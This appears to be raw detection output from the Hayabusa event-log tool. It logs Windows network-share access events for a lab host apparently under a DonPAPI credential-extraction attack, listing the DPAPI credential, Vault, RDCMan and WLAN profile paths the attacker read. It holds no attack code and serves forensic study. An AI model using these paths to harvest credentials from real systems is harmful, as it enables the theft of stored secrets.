0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.654 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.654 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.670 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.670 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.670 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.670 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.670 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.670 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.670 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.686 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.686 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.686 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.686 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.686 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.686 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.701 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.701 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.701 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.701 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.701 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.701 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.717 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.717 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.717 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 
07:16:02.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.733 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.733 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.733 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.733 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.733 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.733 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 
+2021-12-12 07:16:02.748 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.748 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.748 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.748 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.748 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.748 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.748 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.765 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.765 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.765 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.765 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Wlansvc\Profiles\Interfaces | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.765 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.780 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol | IP Addr: 
10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.796 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.796 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.796 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.796 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.796 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: 
admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.796 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.813 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.815 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.702 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.702 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.717 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.717 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 
